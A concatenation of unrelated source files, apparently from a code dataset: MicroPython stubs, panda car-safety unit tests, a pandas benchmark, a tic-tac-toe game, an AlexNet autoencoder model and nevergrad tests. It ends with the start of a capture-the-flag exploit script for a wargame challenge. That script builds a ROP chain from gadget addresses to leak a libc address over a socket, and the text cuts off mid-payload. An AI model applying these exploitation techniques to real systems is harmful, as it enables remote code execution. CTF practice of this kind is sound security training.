# implementations live in the MicroPython firmware. They exist only so that
# IDEs and linters can resolve the names.
def cos():
    pass
e = 2.718282  # Euler's number, truncated to this port's float precision
def exp():
    pass
def log():
    pass
def log10():
    pass
def phase():
    pass
pi = 3.141593  # pi, truncated to this port's float precision
def polar():
    pass
def rect():
    pass
def sin():
    pass
def sqrt():
    pass
| 2 | 2 |
tests/safety/common.py | Vaggysag/panda | 0 | 12762523 | <gh_stars>0
import abc
import struct
import unittest
from opendbc.can.packer import CANPacker # pylint: disable=import-error
from panda.tests.safety import libpandasafety_py
MAX_WRONG_COUNTERS = 5
class UNSAFE_MODE:
  # Bitmask-style flags (values are powers of two) selecting optional
  # relaxations of the safety model; see test_unsafe_mode_no_disengage_on_gas.
  DEFAULT = 0
  DISABLE_DISENGAGE_ON_GAS = 1
  DISABLE_STOCK_AEB = 2
  RAISE_LONGITUDINAL_LIMITS_TO_ISO_MAX = 8
def twos_comp(val, bits):
  """Return the unsigned two's-complement encoding of `val` in `bits` bits."""
  return val if val >= 0 else (1 << bits) + val
def package_can_msg(msg):
  """Convert an (addr, _, data_bytes, bus) tuple into a CAN_FIFOMailBox_TypeDef.

  The register layout mirrors the mailbox struct used by the panda firmware.
  """
  addr, _, dat, bus = msg
  # Split up to 8 data bytes (zero-padded) into two little-endian 32-bit words.
  rdlr, rdhr = struct.unpack('II', dat.ljust(8, b'\x00'))

  ret = libpandasafety_py.ffi.new('CAN_FIFOMailBox_TypeDef *')
  if addr >= 0x800:
    # Address doesn't fit in 11 bits: encode as an extended identifier.
    ret[0].RIR = (addr << 3) | 5
  else:
    # Standard 11-bit identifier.
    ret[0].RIR = (addr << 21) | 1
  ret[0].RDTR = len(dat) | ((bus & 0xF) << 4)  # length plus bus number nibble
  ret[0].RDHR = rdhr
  ret[0].RDLR = rdlr
  return ret
def make_msg(bus, addr, length=8):
  # Convenience wrapper: an all-zero CAN message of the given length.
  return package_can_msg([addr, 0, b'\x00'*length, bus])
def interceptor_msg(gas, addr):
  """Build a gas-interceptor message carrying `gas` and `gas * 2` as two
  big-endian 16-bit values in the low data word."""
  to_send = make_msg(0, addr, 6)
  gas2 = gas * 2
  to_send[0].RDLR = ((gas & 0xff) << 8) | ((gas & 0xff00) >> 8) | \
                    ((gas2 & 0xff) << 24) | ((gas2 & 0xff00) << 8)
  return to_send
class CANPackerPanda(CANPacker):
  """CANPacker that wraps packed messages in the panda mailbox format."""

  def make_can_msg_panda(self, name_or_addr, bus, values, counter=-1):
    """Pack a CAN message and convert it for the panda safety hooks.

    Bug fix: the caller-supplied ``counter`` is now forwarded to
    ``make_can_msg`` instead of always being hard-coded to -1.
    """
    msg = self.make_can_msg(name_or_addr, bus, values, counter=counter)
    return package_can_msg(msg)
class PandaSafetyTest(unittest.TestCase):
  """Shared safety-model tests. Concrete per-car subclasses set the class
  attributes below, assign `self.safety`, and implement the _*_msg builders."""
  TX_MSGS = None                   # allowed (addr, bus) pairs for tx
  STANDSTILL_THRESHOLD = None      # speed value at/below which the car counts as stopped
  RELAY_MALFUNCTION_ADDR = None
  RELAY_MALFUNCTION_BUS = None
  FWD_BLACKLISTED_ADDRS = {}  # {bus: [addr]}
  FWD_BUS_LOOKUP = {}
  @classmethod
  def setUpClass(cls):
    # The abstract base itself must not run; only concrete subclasses do.
    if cls.__name__ == "PandaSafetyTest":
      cls.safety = None
      raise unittest.SkipTest
  def _rx(self, msg):
    return self.safety.safety_rx_hook(msg)
  def _tx(self, msg):
    return self.safety.safety_tx_hook(msg)
  @abc.abstractmethod
  def _brake_msg(self, brake):
    pass
  @abc.abstractmethod
  def _speed_msg(self, speed):
    pass
  @abc.abstractmethod
  def _gas_msg(self, speed):
    pass
  # ***** standard tests for all safety modes *****
  def test_relay_malfunction(self):
    # each car has an addr that is used to detect relay malfunction
    # if that addr is seen on specified bus, triggers the relay malfunction
    # protection logic: both tx_hook and fwd_hook are expected to return failure
    self.assertFalse(self.safety.get_relay_malfunction())
    self._rx(make_msg(self.RELAY_MALFUNCTION_BUS, self.RELAY_MALFUNCTION_ADDR, 8))
    self.assertTrue(self.safety.get_relay_malfunction())
    for a in range(1, 0x800):
      for b in range(0, 3):
        self.assertFalse(self._tx(make_msg(b, a, 8)))
        self.assertEqual(-1, self.safety.safety_fwd_hook(b, make_msg(b, a, 8)))
  def test_fwd_hook(self):
    # some safety modes don't forward anything, while others blacklist msgs
    for bus in range(0x0, 0x3):
      for addr in range(0x1, 0x800):
        # assume len 8
        msg = make_msg(bus, addr, 8)
        fwd_bus = self.FWD_BUS_LOOKUP.get(bus, -1)
        if bus in self.FWD_BLACKLISTED_ADDRS and addr in self.FWD_BLACKLISTED_ADDRS[bus]:
          fwd_bus = -1
        self.assertEqual(fwd_bus, self.safety.safety_fwd_hook(bus, msg))
  def test_spam_can_buses(self):
    # every (addr, bus) pair NOT whitelisted in TX_MSGS must be rejected
    for addr in range(1, 0x800):
      for bus in range(0, 4):
        if all(addr != m[0] or bus != m[1] for m in self.TX_MSGS):
          self.assertFalse(self._tx(make_msg(bus, addr, 8)))
  def test_default_controls_not_allowed(self):
    self.assertFalse(self.safety.get_controls_allowed())
  def test_manually_enable_controls_allowed(self):
    self.safety.set_controls_allowed(1)
    self.assertTrue(self.safety.get_controls_allowed())
    self.safety.set_controls_allowed(0)
    self.assertFalse(self.safety.get_controls_allowed())
  def test_prev_gas(self):
    # the rx hook must track the latest gas-pedal state
    for pressed in [True, False]:
      self._rx(self._gas_msg(pressed))
      self.assertEqual(pressed, self.safety.get_gas_pressed_prev())
  def test_allow_engage_with_gas_pressed(self):
    # engaging while gas is already held must not immediately disengage
    self._rx(self._gas_msg(1))
    self.safety.set_controls_allowed(True)
    self._rx(self._gas_msg(1))
    self.assertTrue(self.safety.get_controls_allowed())
    self._rx(self._gas_msg(1))
    self.assertTrue(self.safety.get_controls_allowed())
  def test_disengage_on_gas(self):
    # a rising edge of gas while engaged must disengage
    self._rx(self._gas_msg(0))
    self.safety.set_controls_allowed(True)
    self._rx(self._gas_msg(1))
    self.assertFalse(self.safety.get_controls_allowed())
  def test_unsafe_mode_no_disengage_on_gas(self):
    # with the unsafe-mode flag set, gas no longer disengages
    self._rx(self._gas_msg(0))
    self.safety.set_controls_allowed(True)
    self.safety.set_unsafe_mode(UNSAFE_MODE.DISABLE_DISENGAGE_ON_GAS)
    self._rx(self._gas_msg(1))
    self.assertTrue(self.safety.get_controls_allowed())
  def test_allow_brake_at_zero_speed(self):
    # Brake was already pressed
    self._rx(self._speed_msg(0))
    self._rx(self._brake_msg(1))
    self.safety.set_controls_allowed(1)
    self._rx(self._brake_msg(1))
    self.assertTrue(self.safety.get_controls_allowed())
    self._rx(self._brake_msg(0))
    self.assertTrue(self.safety.get_controls_allowed())
    # rising edge of brake should disengage
    self._rx(self._brake_msg(1))
    self.assertFalse(self.safety.get_controls_allowed())
    self._rx(self._brake_msg(0))  # reset no brakes
  def test_not_allow_brake_when_moving(self):
    # Brake was already pressed
    self._rx(self._brake_msg(1))
    self.safety.set_controls_allowed(1)
    self._rx(self._speed_msg(self.STANDSTILL_THRESHOLD))
    self._rx(self._brake_msg(1))
    self.assertTrue(self.safety.get_controls_allowed())
    # above the standstill threshold, a continued brake press disengages
    self._rx(self._speed_msg(self.STANDSTILL_THRESHOLD + 1))
    self._rx(self._brake_msg(1))
    self.assertFalse(self.safety.get_controls_allowed())
    self._rx(self._speed_msg(0))
# TODO: use PandaSafetyTest for all tests and delete this
class StdTest:
  """Legacy static helpers mirroring PandaSafetyTest; per the TODO above, this
  class is slated for deletion once every car test uses PandaSafetyTest."""
  @staticmethod
  def test_relay_malfunction(test, addr, bus=0):
    # input is a test class and the address that, if seen on specified bus, triggers
    # the relay_malfunction protection logic: both tx_hook and fwd_hook are
    # expected to return failure
    test.assertFalse(test.safety.get_relay_malfunction())
    test.safety.safety_rx_hook(make_msg(bus, addr, 8))
    test.assertTrue(test.safety.get_relay_malfunction())
    for a in range(1, 0x800):
      for b in range(0, 3):
        test.assertFalse(test.safety.safety_tx_hook(make_msg(b, a, 8)))
        test.assertEqual(-1, test.safety.safety_fwd_hook(b, make_msg(b, a, 8)))
  @staticmethod
  def test_manually_enable_controls_allowed(test):
    test.safety.set_controls_allowed(1)
    test.assertTrue(test.safety.get_controls_allowed())
    test.safety.set_controls_allowed(0)
    test.assertFalse(test.safety.get_controls_allowed())
  @staticmethod
  def test_spam_can_buses(test, TX_MSGS):
    # every (addr, bus) pair NOT whitelisted in TX_MSGS must be rejected
    for addr in range(1, 0x800):
      for bus in range(0, 4):
        if all(addr != m[0] or bus != m[1] for m in TX_MSGS):
          test.assertFalse(test.safety.safety_tx_hook(make_msg(bus, addr, 8)))
  @staticmethod
  def test_allow_brake_at_zero_speed(test):
    # Brake was already pressed
    test.safety.safety_rx_hook(test._speed_msg(0))
    test.safety.safety_rx_hook(test._brake_msg(1))
    test.safety.set_controls_allowed(1)
    test.safety.safety_rx_hook(test._brake_msg(1))
    test.assertTrue(test.safety.get_controls_allowed())
    test.safety.safety_rx_hook(test._brake_msg(0))
    test.assertTrue(test.safety.get_controls_allowed())
    # rising edge of brake should disengage
    test.safety.safety_rx_hook(test._brake_msg(1))
    test.assertFalse(test.safety.get_controls_allowed())
    test.safety.safety_rx_hook(test._brake_msg(0))  # reset no brakes
  @staticmethod
  def test_not_allow_brake_when_moving(test, standstill_threshold):
    # Brake was already pressed
    test.safety.safety_rx_hook(test._brake_msg(1))
    test.safety.set_controls_allowed(1)
    test.safety.safety_rx_hook(test._speed_msg(standstill_threshold))
    test.safety.safety_rx_hook(test._brake_msg(1))
    test.assertTrue(test.safety.get_controls_allowed())
    # above the standstill threshold, a continued brake press disengages
    test.safety.safety_rx_hook(test._speed_msg(standstill_threshold + 1))
    test.safety.safety_rx_hook(test._brake_msg(1))
    test.assertFalse(test.safety.get_controls_allowed())
    test.safety.safety_rx_hook(test._speed_msg(0))
| 2.171875 | 2 |
asv_bench/benchmarks/io/style.py | umangino/pandas | 28,899 | 12762524 | import numpy as np
from pandas import (
DataFrame,
IndexSlice,
)
class Render:
    """ASV benchmarks for pandas Styler HTML rendering.

    Each time_*/peakmem_* pair applies one styling feature to the frame built
    in setup() and then measures the private render path. Method names follow
    the asv convention (time_* for wall time, peakmem_* for peak memory).
    """
    # Benchmark grid: number of columns x number of rows.
    params = [[12, 24, 36], [12, 120]]
    param_names = ["cols", "rows"]
    def setup(self, cols, rows):
        # Fresh random frame with predictable labels used by the subsets below.
        self.df = DataFrame(
            np.random.randn(rows, cols),
            columns=[f"float_{i+1}" for i in range(cols)],
            index=[f"row_{i+1}" for i in range(rows)],
        )
    def time_apply_render(self, cols, rows):
        self._style_apply()
        self.st._render_html(True, True)
    def peakmem_apply_render(self, cols, rows):
        self._style_apply()
        self.st._render_html(True, True)
    def time_classes_render(self, cols, rows):
        self._style_classes()
        self.st._render_html(True, True)
    def peakmem_classes_render(self, cols, rows):
        self._style_classes()
        self.st._render_html(True, True)
    def time_tooltips_render(self, cols, rows):
        self._style_tooltips()
        self.st._render_html(True, True)
    def peakmem_tooltips_render(self, cols, rows):
        self._style_tooltips()
        self.st._render_html(True, True)
    def time_format_render(self, cols, rows):
        self._style_format()
        self.st._render_html(True, True)
    def peakmem_format_render(self, cols, rows):
        self._style_format()
        self.st._render_html(True, True)
    def time_apply_format_hide_render(self, cols, rows):
        self._style_apply_format_hide()
        self.st._render_html(True, True)
    def peakmem_apply_format_hide_render(self, cols, rows):
        self._style_apply_format_hide()
        self.st._render_html(True, True)
    def _style_apply(self):
        # Row-wise style function that highlights a single row.
        def _apply_func(s):
            return [
                "background-color: lightcyan" if s.name == "row_1" else "" for v in s
            ]
        self.st = self.df.style.apply(_apply_func, axis=1)
    def _style_classes(self):
        # Attach a CSS class to every positive cell.
        classes = self.df.applymap(lambda v: ("cls-1" if v > 0 else ""))
        classes.index, classes.columns = self.df.index, self.df.columns
        self.st = self.df.style.set_td_classes(classes)
    def _style_format(self):
        # Format the top-left three quarters of the frame.
        ic = int(len(self.df.columns) / 4 * 3)
        ir = int(len(self.df.index) / 4 * 3)
        # apply a formatting function
        # subset is flexible but hinders vectorised solutions
        self.st = self.df.style.format(
            "{:,.3f}", subset=IndexSlice["row_1":f"row_{ir}", "float_1":f"float_{ic}"]
        )
    def _style_apply_format_hide(self):
        self.st = self.df.style.applymap(lambda v: "color: red;")
        self.st.format("{:.3f}")
        self.st.hide_index(self.st.index[1:])
        self.st.hide_columns(self.st.columns[1:])
    def _style_tooltips(self):
        # Tooltips on every other row/column, with most of the frame hidden.
        ttips = DataFrame("abc", index=self.df.index[::2], columns=self.df.columns[::2])
        self.st = self.df.style.set_tooltips(ttips)
        self.st.hide_index(self.st.index[12:])
        self.st.hide_columns(self.st.columns[12:])
| 2.6875 | 3 |
morpion.py | revaxl/tictactoe | 0 | 12762525 | <reponame>revaxl/tictactoe<filename>morpion.py
grid = []
# create an empty grid
def init():
    """Fill the global grid with three rows of three empty cells ('_')."""
    for _ in range(3):
        grid.append(['_', '_', '_'])
# print the grid on screen
def affiche(grid):
    """Print the board: column headers A-C, then each row prefixed 1-3."""
    for j in ['A', 'B', 'C']:
        print(' ',j, sep=' ', end=' ')
    print('')
    # Rows are numbered from 1 and printed as raw Python lists.
    for i in range(len(grid)):
        print(i+1, grid[i])
# check if the user input is valid
def casevide(grid, i, j):
    """Return True when cell (i, j) is inside the grid and still empty ('_').

    Bug fix: negative indices used to wrap around (Python list semantics) and
    could report an occupied cell on the opposite edge as valid; they are now
    rejected as out of bounds.
    """
    if i < 0 or j < 0:
        return False
    try:
        return grid[i][j] == '_'
    except IndexError:
        # Index past the end of a row/column: treat as an invalid cell.
        return False
# get the user input and place X on the location choosen by the user
# if the validation is OK
def choixjoueur(grid):
    """Ask the player for a cell like '1A' and place an 'X' there.

    Retries recursively until a free cell is chosen.
    """
    choix = input('select a place ')
    # NOTE(review): this crashes on input that is not exactly two characters
    # (unpacking error) or whose first character is not a digit (int()).
    [i,j] = choix
    i = int(i) - 1
    # Map the column letter to an index; anything unrecognised falls back to 0.
    if j.lower() == 'a': j = 0
    elif j.lower() == 'b': j = 1
    elif j.lower() == 'c': j = 2
    else: j = 0
    print(i,j)
    if casevide(grid, i, j) == True:
        grid[i][j] = 'X'
    else:
        print('wrong place, choose again')
        # Recurse until the player picks a valid empty cell.
        choixjoueur(grid)
def choixmachine(grid):
    """Place an 'O' for the computer on a uniformly random empty cell."""
    import random as rd
    while True:
        # randint bounds are inclusive; 0..2 are the valid indices.
        # Fix: the original used randint(0, 3), so index 3 was generated and
        # silently rejected by casevide's IndexError handling, wasting tries.
        i = rd.randint(0, 2)
        j = rd.randint(0, 2)
        if casevide(grid, i, j):
            print(i, j)
            grid[i][j] = 'O'
            break
# check if the grid is full or not
def gridplein(grid):
    """Return True when no empty cell ('_') remains anywhere in the grid."""
    return all('_' not in row for row in grid)
# check the grid for winner every turn
# compare each point in the grid to the points next to it
# if the points has the same X or O then declare winner and exit
def winner(grid, char):
    """Return True if `char` ('X' or 'O') has a full row, column, or diagonal.

    Rewritten: the original compared whole row lists to `char` in the column
    test (always False), duplicated the j == 1 / i == 1 branches instead of
    checking the last column/row, had a bare `True` where a `return True`
    belonged, and never checked the diagonals.
    """
    n = len(grid)
    # Rows and columns.
    for i in range(n):
        if all(grid[i][j] == char for j in range(n)):
            return True
        if all(grid[j][i] == char for j in range(n)):
            return True
    # Main diagonal and anti-diagonal.
    if all(grid[i][i] == char for i in range(n)):
        return True
    if all(grid[i][n - 1 - i] == char for i in range(n)):
        return True
    return False
init()
# Main game loop: the player ('X') and the machine ('O') alternate moves until
# one of them wins or the board fills up.
while True:
    choixjoueur(grid)
    if winner(grid, 'X') == True:
        affiche(grid)
        print('Winner => user')
        break
    choixmachine(grid)
    # NOTE(review): the machine's win is only checked while the board is NOT
    # yet full, so a winning machine move that also fills the last cell is
    # reported as 'No Winner'.
    if gridplein(grid) == False:
        if winner(grid, 'O') == True:
            print('Winner => computer')
            break
        affiche(grid)
    else:
        affiche(grid)
        print('No Winner')
        break
| 3.984375 | 4 |
research/slim/autoencoders/nets_bm/alexnet/alexnet_bm.py | Dzinushi/models_1_4 | 0 | 12762526 | <reponame>Dzinushi/models_1_4
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains a model definition for AlexNet.
This work was first described in:
ImageNet Classification with Deep Convolutional Neural Networks
<NAME>, <NAME> and <NAME>
and later refined in:
One weird trick for parallelizing convolutional neural networks
<NAME>, 2014
Here we provide the implementation proposed in "One weird trick" and not
"ImageNet Classification", as per the paper, the LRN layers have been removed.
Usage:
with slim.arg_scope(alexnet.alexnet_v2_arg_scope()):
outputs, end_points = alexnet.alexnet_v2(inputs)
@@alexnet_v2
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from collections import OrderedDict
from autoencoders.ae_utils import sdc_conv_block, set_model_losses, scope_with_sdc
from tensorflow.contrib import slim
# Shorthand for a zero-mean truncated-normal weight initializer.
trunc_normal = lambda stddev: tf.truncated_normal_initializer(0.0, stddev)
# Name suffix — presumably appended to deconvolution (transposed conv)
# endpoint names by the sdc helpers; confirm in autoencoders.ae_utils.
dconv = '_dconv2d'
def alexnet_v2(inputs,
               scope='alexnet_v2',
               sdc_num=1,
               train_block_num=0,
               channel=3,
               activation_fn=tf.nn.relu):
    """AlexNet v2 backbone instrumented for per-block SDC autoencoder training.

    Described in: http://arxiv.org/pdf/1404.5997v2.pdf

    The network is divided into 7 blocks (conv1..conv5, fc6, fc7).  Exactly
    one block -- selected by ``train_block_num`` -- is built through
    ``sdc_conv_block`` (encoder conv + SDC decoder) and the function returns
    early right after building it.  Every block before the selected one is
    built as a frozen (``trainable=False``) plain conv layer so previously
    trained weights can be restored and reused.

    Args:
      inputs: a tensor of size [batch_size, height, width, channels].
      scope: optional variable scope for the network.
      sdc_num: number of SDC decoder repetitions passed to ``sdc_conv_block``.
      train_block_num: index (0-6) of the single block to build for training.
      channel: input channel count; used as decoder output depth of block 0
        so it reconstructs the input image.
      activation_fn: activation used by encoder and decoder layers.

    Returns:
      When the selected block is reached (early return):
        (net, end_points, pad, stride) -- ``pad``/``stride`` describe the
        encoder conv geometry so the caller can mirror it.
      Otherwise (``train_block_num`` beyond the last block):
        (net, end_points).
    """
    # True only for the block currently being trained.
    trainable_fn = lambda train_block_num, block_num: block_num == train_block_num
    with tf.variable_scope(scope, 'alexnet_v2', [inputs]):
        # Collect outputs for conv2d, fully_connected and max_pool2d.
        net = inputs
        end_points = OrderedDict()
        end_points[scope_with_sdc('input', 0)] = net
        # SDC 0
        if trainable_fn(train_block_num, 0):
            pad = 'VALID'
            stride = 4
            net, end_points = sdc_conv_block(end_points, net,
                                             num_outputs=64,
                                             num_sdc_outputs=channel,
                                             kernel_size=[11, 11],
                                             stride=stride,
                                             padding=pad,
                                             activation=activation_fn,
                                             activation_sdc=activation_fn,
                                             sdc_num=sdc_num,
                                             scope_conv='conv1',
                                             scope_dconv='input')
            return net, end_points, pad, stride
        else:
            layer_scope = 'conv1'
            # Frozen pre-trained layer; AUTO_REUSE allows the same variables
            # to be picked up on repeated graph construction.
            net = slim.conv2d(inputs, 64, [11, 11], 4, activation_fn=activation_fn, trainable=False, reuse=tf.AUTO_REUSE, padding='VALID',
                              scope=layer_scope)
            end_points[scope_with_sdc(layer_scope, 0)] = net
        layer_scope = 'pool1'
        end_points[scope_with_sdc(layer_scope, 0)] = net = slim.max_pool2d(net, [3, 3], stride=2, scope=layer_scope)
        # SDC 1
        pad = 'SAME'
        stride = 1
        if trainable_fn(train_block_num, 1):
            net, end_points = sdc_conv_block(end_points,
                                             net,
                                             num_outputs=192,
                                             num_sdc_outputs=64,
                                             kernel_size=[5, 5],
                                             activation=activation_fn,
                                             activation_sdc=activation_fn,
                                             sdc_num=sdc_num,
                                             scope_conv='conv2',
                                             scope_dconv='pool1')
            return net, end_points, pad, stride
        else:
            layer_scope = 'conv2'
            net = slim.conv2d(net, 192, [5, 5], activation_fn=activation_fn, trainable=False, reuse=tf.AUTO_REUSE, scope='conv2')
            end_points[scope_with_sdc(layer_scope, 0)] = net
        layer_scope = 'pool2'
        end_points[scope_with_sdc(layer_scope, 0)] = net = slim.max_pool2d(net, [3, 3], stride=2, scope=layer_scope)
        # SDC 2
        if trainable_fn(train_block_num, 2):
            net, end_points = sdc_conv_block(end_points,
                                             net,
                                             num_outputs=384,
                                             num_sdc_outputs=192,
                                             kernel_size=[3, 3],
                                             activation=activation_fn,
                                             activation_sdc=activation_fn,
                                             sdc_num=sdc_num,
                                             scope_conv='conv3',
                                             scope_dconv='pool2')
            return net, end_points, pad, stride
        else:
            layer_scope = 'conv3'
            end_points[scope_with_sdc(layer_scope, 0)] = net = \
                slim.conv2d(net, 384, [3, 3], activation_fn=activation_fn, trainable=False, reuse=tf.AUTO_REUSE, scope=layer_scope)
        # SDC 3
        if trainable_fn(train_block_num, 3):
            net, end_points = sdc_conv_block(end_points,
                                             net,
                                             num_outputs=384,
                                             num_sdc_outputs=384,
                                             kernel_size=[3, 3],
                                             activation=activation_fn,
                                             activation_sdc=activation_fn,
                                             sdc_num=sdc_num,
                                             scope_conv='conv4',
                                             scope_dconv='conv3')
            return net, end_points, pad, stride
        else:
            layer_scope = 'conv4'
            end_points[scope_with_sdc(layer_scope, 0)] = net = \
                slim.conv2d(net, 384, [3, 3], activation_fn=activation_fn, trainable=False, reuse=tf.AUTO_REUSE, scope=layer_scope)
        # SDC 4
        if trainable_fn(train_block_num, 4):
            net, end_points = sdc_conv_block(end_points,
                                             net,
                                             num_outputs=256,
                                             num_sdc_outputs=384,
                                             kernel_size=[3, 3],
                                             activation=activation_fn,
                                             activation_sdc=activation_fn,
                                             sdc_num=sdc_num,
                                             scope_conv='conv5',
                                             scope_dconv='conv4')
            return net, end_points, pad, stride
        else:
            layer_scope = 'conv5'
            end_points[scope_with_sdc(layer_scope, 0)] = net = \
                slim.conv2d(net, 256, [3, 3], activation_fn=activation_fn, trainable=False, reuse=tf.AUTO_REUSE, scope=layer_scope)
        layer_scope = 'pool5'
        end_points[scope_with_sdc(layer_scope, 0)] = net = slim.max_pool2d(net, [3, 3], 2, scope=layer_scope)
        # SDC 5
        if trainable_fn(train_block_num, 5):
            pad = 'VALID'
            net, end_points = sdc_conv_block(end_points,
                                             net,
                                             num_outputs=4096,
                                             num_sdc_outputs=256,
                                             kernel_size=[5, 5],
                                             sdc_num=sdc_num,
                                             padding=pad,
                                             weights_initializer=trunc_normal(0.005),
                                             biases_initializer=tf.constant_initializer(0.1),
                                             activation=activation_fn,
                                             activation_sdc=activation_fn,
                                             scope_conv='fc6',
                                             scope_dconv='pool5')
            return net, end_points, pad, stride
        else:
            layer_scope = 'fc6'
            # NOTE(review): the trainable branch above builds fc6 with
            # padding='VALID', while this frozen path passes padding=pad,
            # where pad is still 'SAME' from the SDC 1 section -- confirm
            # whether the mismatch in spatial dims is intentional.
            end_points[scope_with_sdc(layer_scope, 0)] = net = \
                slim.conv2d(net, 4096, [5, 5], activation_fn=activation_fn, trainable=False, reuse=tf.AUTO_REUSE, padding=pad, scope=layer_scope)
        # SDC 6
        if trainable_fn(train_block_num, 6):
            # NOTE(review): pad is set to 'VALID' here but never passed to
            # sdc_conv_block (a 1x1 conv is padding-insensitive anyway);
            # it is only propagated to the caller via the return value.
            pad = 'VALID'
            net, end_points = sdc_conv_block(end_points,
                                             net,
                                             num_outputs=4096,
                                             num_sdc_outputs=4096,
                                             kernel_size=[1, 1],
                                             sdc_num=sdc_num,
                                             activation=activation_fn,
                                             activation_sdc=activation_fn,
                                             weights_initializer=trunc_normal(0.005),
                                             biases_initializer=tf.constant_initializer(0.1),
                                             scope_conv='fc7',
                                             scope_dconv='fc6')
            return net, end_points, pad, stride
        else:
            layer_scope = 'fc7'
            end_points[scope_with_sdc(layer_scope, 0)] = net = \
                slim.conv2d(net, 4096, [1, 1], activation_fn=activation_fn, trainable=False, reuse=tf.AUTO_REUSE, scope=layer_scope)
        return net, end_points
# Input size the architecture expects and the number of trainable SDC blocks
# (conv1..conv5, fc6, fc7).
# NOTE(review): 224 is the usual AlexNet input size -- confirm 223 is intended.
alexnet_v2.default_image_size = 223
alexnet_v2.block_number = 7
def alexnet_model_losses(end_points, train_block_num=0, sdc_num=1):
    """Build the SDC reconstruction losses for one training block.

    Maps the block index to its [decoder-target, encoder] scope pair and
    delegates to ``set_model_losses``.  Raises KeyError for an index
    outside 0..6.
    """
    targets = ['input', 'pool1', 'pool2', 'conv3', 'conv4', 'pool5', 'fc6']
    encoders = ['conv1', 'conv2', 'conv3', 'conv4', 'conv5', 'fc6', 'fc7']
    scope_pairs = {idx: [src, enc]
                   for idx, (src, enc) in enumerate(zip(targets, encoders))}
    return set_model_losses(end_points, scope_pairs[train_block_num], sdc_num)
| 2.453125 | 2 |
nevergrad/functions/photonics/test_core.py | donghun2018/nevergrad | 0 | 12762527 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import List
from unittest.mock import patch
from unittest import TestCase
import genty
import numpy as np
from . import core
@genty.genty
class BenchmarkTests(TestCase):
    """Checks Photonics parameter transforms against golden values."""

    @genty.genty_dataset(  # type: ignore
        bragg=("bragg", [2.93, 2.18, 2.35, 2.12, 31.53, 15.98, 226.69, 193.11]),
        morpho=("morpho", [280.36, 52.96, 208.16, 72.69, 89.92, 60.37, 226.69, 193.11]),
        chirped=("chirped", [280.36, 52.96, 104.08, 36.34, 31.53, 15.98, 226.69, 193.11]),
    )
    def test_photonics_transforms(self, pb: str, expected: List[float]) -> None:
        # Fixed seed so the sampled input (and thus the transform output)
        # is reproducible across runs.
        np.random.seed(24)
        # Pretend the external solver binary exists so construction succeeds.
        with patch("shutil.which", return_value="here"):
            func = core.Photonics(pb, 16)  # should be 8... but it is actually not allowed. Nevermind here
        x = np.random.normal(0, 1, size=8)
        output = func.transform(x)
        np.testing.assert_almost_equal(output, expected, decimal=2)
        # Re-draw with the same seed to prove transform() did not mutate x.
        np.random.seed(24)
        x2 = np.random.normal(0, 1, size=8)
        np.testing.assert_almost_equal(x, x2, decimal=2, err_msg="x was modified in the process")
def test_tanh_crop() -> None:
    """tanh_crop must squash extreme values to the bounds and map 0 to the midpoint."""
    result = core.tanh_crop([-1e9, 1e9, 0], -12, 16)
    np.testing.assert_almost_equal(result, [-12, 16, 2])
def test_morpho_transform_constraints() -> None:
    """The 'morpho' transform output must respect its per-quarter bounds."""
    with patch("shutil.which", return_value="here"):
        func = core.Photonics("morpho", 60)
    x = np.random.normal(0, 5, size=60)  # std 5 to play with boundaries
    output = func.transform(x)
    assert np.all(output >= 0)
    # The 60-dim parameter vector is split into 4 groups of 15, each with
    # its own bound.
    q = len(x) // 4
    assert np.all(output[:q] <= 300)
    assert np.all(output[q: 3 * q] <= 600)
    assert np.all(output[2 * q: 3 * q] >= 30)
    assert np.all(output[3 * q:] <= 300)
def test_photonics() -> None:
    """End-to-end check of Photonics.__call__: output parsing and error paths."""
    with patch("shutil.which", return_value="here"):
        photo = core.Photonics("bragg", 16)
    # The last line of the external command output is parsed as the value.
    # (The original code nested two identical patch() contexts here; one
    # suffices -- patching the same target twice is redundant.)
    with patch("nevergrad.instrumentation.utils.CommandFunction.__call__", return_value="line1\n12\n"):
        output = photo(np.zeros(16))
    np.testing.assert_equal(output, 12)
    # check error: unparsable output raises RuntimeError, and a wrongly
    # sized input fails the dimension assertion.
    with patch("nevergrad.instrumentation.utils.CommandFunction.__call__", return_value="line1\n"):
        np.testing.assert_raises(RuntimeError, photo, np.zeros(16).tolist())
        np.testing.assert_raises(AssertionError, photo, np.zeros(12).tolist())
| 2.140625 | 2 |
whitehat.vn/pwn/pwn002/exploit.py | anarcheuz/CTF | 2 | 12762528 | import struct
import socket
import time
def p(a):
    """Pack integer *a* as a little-endian unsigned 64-bit value."""
    packed = struct.pack("<Q", a)
    return packed
def u(a):
    """Unpack a little-endian unsigned 64-bit value from buffer *a*."""
    (value,) = struct.unpack("<Q", a)
    return value
def recv_until(sock, s="\n"):
    # Read one byte at a time from *sock* until the accumulated data ends
    # with the delimiter *s*; return everything read, delimiter included.
    # NOTE: relies on Python 2 semantics -- recv(1) returns str there, so
    # the += concatenation with the "" accumulator works.
    res = ""
    while 1:
        res += sock.recv(1)
        if res.endswith(s):
            break
    return res
# --- Exploit driver (Python 2): leak libc via puts@GOT, then ROP to execve ---
s = socket.create_connection(('lab30.wargame.whitehat.vn', 7002))
#s = socket.create_connection(('localhost', 4444))

# Binary addresses (PLT/GOT/gadgets) and libc offsets relative to the leak.
puts_got = 0x601018
puts_plt = 0x4005d0
read_plt = 0x4005f0
system_off = -0x297f0 # 0x46640
sh_off = 0x10ceab
pop_rdi = 0x00400b43 #: pop rdi ; ret ; (1 found)
pop_rsi_ = 0x00400b41 #: pop rsi ; pop r15 ; ret ; (1 found)
pop_rbp = 0x00400685 #: pop rbp ; ret ; (1 found)
leave = 0x00400795 #: leave ; ret ; (1 found)
buf = 0x6010A0
main = 0x4009E3 #before first print

# Stage 1: leak the libc address of puts by calling puts(puts@GOT), then
# pivot the stack into buf and restart main for a second overflow.
stage1 = p(0xDEADBEEF)
stage1 += p(pop_rdi)
